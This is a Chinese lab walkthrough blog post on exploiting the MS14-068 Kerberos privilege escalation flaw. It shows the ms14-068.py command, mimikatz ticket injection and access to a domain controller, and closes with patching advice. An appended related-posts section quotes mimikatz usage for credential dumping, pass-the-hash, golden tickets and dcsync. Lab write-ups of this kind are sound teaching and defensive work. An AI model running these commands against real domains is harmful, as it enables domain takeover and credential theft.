域用户更改密码提示拒绝访问_Kerberos域用户提权漏洞(MS14068)

最新推荐文章于 2024-06-06 19:20:27 发布
最新推荐文章于 2024-06-06 19:20:27 发布
阅读量700 收藏
点赞数
文章标签: 域用户更改密码提示拒绝访问 将虚拟主机加入到netskills.net域环境 无需用户名和密码 域验证 查看域用户密码 通过域控制器获取用户的密码 陈桥五笔用户编号获取

漏洞信息

漏洞名称:Kerberos域用户提权漏洞

漏洞编号:MS14-068,CVE-2014-6324

漏洞原理:

Kerberos协议是一种基于第三方可信主机的计算机网络协议,允许两个实体之间在非安全网络环境(可能被窃听、被重放攻击)下,以一种安全的方式证明自己的身份。

b973c7a2c245c7eef4ee8bfc93dcd323.png

用户在向Kerberos密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的Kerberos票据。如果票据声明自己有域管理员权限,而KDC在处理该票据时未验证票据的签名,那么返回给用户的TGT使得普通域用户拥有了域管理员权限。

该用户可以将TGT发送到KDC,KDC的票据授权服务(TGS)在验证了TGT后,将服务票据发送给该用户,而该用户拥有该服务的权限,导致活动目录整体权限控制受到影响,攻击者可以访问域内的资源,且可以将域内任意用户权限提升至域管理级别。

受影响的服务器:Windows Server 2003、Windows Server 2008、Windows Server 2008 R2、Windows Server 2012和Windows Server 2012 R2

漏洞利用

域控Windows Server 2008 R2:test1.test.com

普通域用户Windows7:域账号xiaoming/asdf1234@

本地账户:test/password

Windows7加入域参考https://jingyan.baidu.com/article/908080223b8f1afd91c80f30.html

利用条件:攻击者获取了域内任何一台计算机的shell权限,且知道任意域用户的用户名、SID、密码,即可获取域管理员权限。

利用工具:PyKEY,使用它可以生成一张高权限的服务票据,并通过mimikatz将服务票据注入内存。下载地址:https://github.com/mubix/pykek

0b4fb008539f398674a248db77f078dc.png

ms14-068.py是MS14-068的漏洞利用脚本。参数说明:

-u:用户名@域名;

-s:用户SID(security identifiers,安全标识符,是标识用户、组和计算机账户的唯一号码);

-d:域控制器地址;

-p:明文密码;

--rc4:在没有名为密码的情况下,通过NTLM Hash登录。

  • 查看域控制器的补丁安装情况

首先在域控检测是否有MS14-068漏洞,通过systeminfo命令查看是否打补丁来判断:

13463ba6e3f5f0f590a5bfe73ae001a4.png

微软针对MS14-068漏洞提供的补丁为KB3011780,可以看出域控机器没有安装补丁。

  • 查看用户的SID

Windows7用普通域用户xiaoming登录,查看SID:

c355fc24ca105776f4cc74993b6ee0ca.png

SID:S-1-5-21-3081188285-3032033982-3993785026-1105

还可以获取域内所有用户的SID:

9441e865e1af0aaf4956ad93c439d48b.png

  • 查看注入前的权限

访问域控的C盘共享:

ad4869457fd0aa30cb8fbd56d662a7a3.png

提示访问被拒绝。

  • 生成高权限票据

利用exp生成高权限票据:

python ms14-068.py -u 域成员@域名 -s 域成员SID -d 域控制器地址 -p 域成员密码

aa6f57960242f1b607934f4c02c811fd.png

会在当前路径下生成一个名为TGT_域成员@域名.ccache的票据文件:

e96ccf0881e5cc024a0c43e365121c47.png

  • 清除内存中所有票据

为了使我们生成的票据起作用,需要将内存中已有的Kerberos票据清除,清除工具使用mimikatz,下载地址:https://github.com/gentilkiwi/mimikatz/releases

a32081b86ca2b3c93f41c2e3d069194c.png

  • 将高权限票据注入内存

将票据文件复制到mimikatz目录下,使用mimikatz将票据注入内存:

kerberos::ptc “票据文件”

f1bca8325cfb530612ae4e1dfa3ba64c.png

显示Injecting ticket:OK,表示注入成功。

  • 权限验证

再次使用dir列出域控制器C盘的内容:

c2f65173cffd21876b67a940b94985ed.png

漏洞防范

1、        开启Windows update功能,进行自动更新

2、        对域内账号进行控制,禁止使用弱口令、定期修改密码等

3、        手动下载补丁包进行漏洞修复:https://technet.microsoft.com/library/security/ms14-068

参考

1、        https://www.freebuf.com/vuls/56081.html

2、        https://mp.weixin.qq.com/s/T4HU6k10m4x5CLNuLuGrfQ

weixin_39574928
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用户更改密码提示拒绝访问_AD中的ACL攻防探索
weixin_39562615的博客
11-23 2935
前言关于内ACL的攻防近两年经常被人所提起,同时也产生了很多关于内ACL相关的工具和攻击方式,本文将会从ACL的概念谈起,然后介绍几种不同的内攻击方式以及如何监测和防御对于ACL的攻击。ACL的概念和作用ACM:首先想要了解ACL首先需要了解Access Control Model(访问控制模型),根据官网(https://docs.microsoft.com/zh-cn/wind...
用户更改密码提示拒绝访问_Windows 7如何更改或重置 Windows 密码,我教你
weixin_39849548的博客
12-03 3369
Windows 7重置密码我的计算机在中选择 " 开始 " 按钮 ,选择"控制面板",选择 "用户帐户",选择 "用户帐户",然后选择 "管理用户帐户"。 如果系统提示您输入管理员密码或进行确认,请键入密码或提供确认。在“用户”选项卡上的“本机用户”下,选择用户帐户名,然后选择“重置密码”。键入新密码,确认新密码,然后选择“确定”。我的计算机在工作组中如果你在尝试登录时键入的密码错误,Windo...
mimikatz,ms14068
04-02
mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!
黄金票据、白银票据与ms14-068
最新发布
mashiro_hibiki的博客
06-06 596
安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户。我们是一个快速成长的team,团队的发展方向与每一位星友的学习方向密切相关,加入我们,一起成为更好的自己!ms14068漏洞原理是伪造管的tgt。
用户更改密码提示拒绝访问_Kerberos KDC权限提升漏洞总结
weixin_39559333的博客
12-03 956
01漏洞起源Windows Kerberoskerberos tickets 中的 PAC(Privilege Attribute Certificate)的验证流程中存在安全漏洞,低权限的经过认证的远程攻击者利用该漏洞可以伪造一个PAC并通过 Kerberos KDC(Key Distribution Center)的验证,攻击成功使得攻击者可以提升权限,获取管理权限。02漏洞描述(1)...
iisadmpwd windows用户web密码更改asp源码
12-27
2. **身份验证**:IISADMPWD首先会进行身份验证,确保只有合法的用户才能访问并更改密码。这通常涉及到NTLM或Kerberos协议,这些协议能验证用户的身份,并且在Windows环境中广泛使用。 3. **AD通信**:源码中的...
kerberos.rar_Kerberos_kerberos Java_single_sso java
07-15
Kerberos协议主要用于计算机网络的身份鉴别(Authentication), 其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的票据(ticket-granting ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和...
JAAS.rar_Action!_Jaas Kerber_jaas KERBEROS_kerberos Java_login.a
09-24
3. **Kerberos与JAAS的结合**:在Java中,可以使用JAAS配置Kerberos服务,使得应用程序能够利用Kerberos进行用户认证。这通常涉及创建一个JAAS配置文件,定义Kerberos登录模块,并指定相关参数。 4. **实现Kerberos...
JAAS.rar_Kerberos_jaas_ldap kerberos
09-14
它让你能够将一些标准的安全机制,例如Solaris NIS(网络信息服务)、Windows NT、LDAP(轻量目录存取协议),Kerberos等通过一种通用的,可配置的方式集成到系统中。本文首先向你介绍JAAS验证中的一些核心部分,...
MS14-068AD提权神器
05-24
1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号...
用户更改密码提示拒绝访问_密码安全系列文章15:磁盘镜像文件加载获取密码...
weixin_39889214的博客
12-01 649
在某些情形下,通过磁盘复制机将物理计算机的磁盘进行拷贝,形成raw文件,这时需要对其硬拷贝的磁盘文件进行查看获取密码,通过实际测试,可以通过AccessData FTK Imager加载磁盘文件进行查看,同时还可以通过StarWindConverter将raw文件转换为vmdk文件后,通过创建虚拟机加载该磁盘文件再现还原镜像。1.1.1安装AccessData FTK Imager软件FTK ...
内网渗透---ms14068
yc的博客
05-24 2805
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、MS14-068的利用条件?二、利用步骤1.查看服务器是否打补丁2.获取用户的sid值3.删除系统票据4.生成票据5.导入票据6.提权利用总结 前言 ms14-068漏洞主要通过伪造管的TGT,将普通用户权限提权管权限,以此来控制控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的控服务器中,都可进行利用。 一、MS14-068的利用条件? 1、获取普通用户的账号密码.
用户更改密码提示拒绝访问_企业网络组建实战第三篇之第二章设置用户以及计算机的加退...
weixin_39640687的博客
12-03 636
本章我们来学习如何创建用户、创建组、划分用户到相应的组以及计算机的加和退。1、首先创建一个组织单位:鼠标右键点名,新建,组织单位填写组织单位名称2、然后在刚才新建好的组织单位右侧空白处,单击鼠标右键,选择新建用户输入用户的姓名和登录的帐户名称为此帐户设置密码,建议有大小写英文字母+数字+特殊符号,并且长度大于8,一般来说,由于密码是管理员创建的,我们应该勾选:“用户下次登录时须更改密码”...
AD渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2587
漏洞编号MS14-068的漏洞,将允许任意用户提升到管理员的权限,补丁编号则是KB3011780 原理分析 ​ 在之前提到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC权限验证机制产生漏洞的原因是
用户无法修改密码问题的解决方案
热门推荐
运维日记
09-29 3万+
问题描述:加的电脑无法更改密码提示“无法更新密码,为新密码提供的值不符合字符的长度、复杂度或历史要求”。 问题原因:域控制器中相关设置问题,主要如下图所示(如启用复杂性、最短期限和强制密码历史) 解决方案:在域控制器更改对应的密码策略即可: ① 禁用复杂性要求 ② 最短使用期限改为0天 ③ 强制密码历史改为0 如果出现无法更改的情况,如下图箭头所指的图标所示 代表需要在域控制器的组策...
使用DirectoryEntry修改用户密码拒绝访问”的问题解决
11-26 4995
<br />续上篇博文《LDAP(轻量目录访问协议)基于C#的System.DirectoryServices进行开发》<br /> <br />通过上次的资料查阅已经开发出用账号密码登陆网站的系统了<br /> <br />但是遗留一个问题:通过网站修改密码同步到账户去<br /> <br />我用的IIS7,首先要给网站配置特定用户即管理员,赋予权限后才可以访问LDAP<br /> <br /> <br />看网上修改密码用的两种方法<br /> <br />1、  //取得DirectoryEnt
MS14-068渗透
bailandawang123的博客
03-10 451
ms14068主要是通过伪造管的tgt,将普通用户提升为用户,从而控制控。
内网安全 - 横向 PTH&PTK&PTT
acepanhuan的博客
03-16 381
内网安全 - 横向 PTH&PTK&PTT
saMAccountName Spoofing漏洞详解:提权原理与实验
"内最新提权漏洞原理深⼊分析,主要涉及两个微软安全补丁修复的漏洞CVE-2021-42287和CVE-2021-42278,这些漏洞被称为saMAccountName spoofing,允许攻击者在只有普通账户的情况下提升权限,控制整个。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值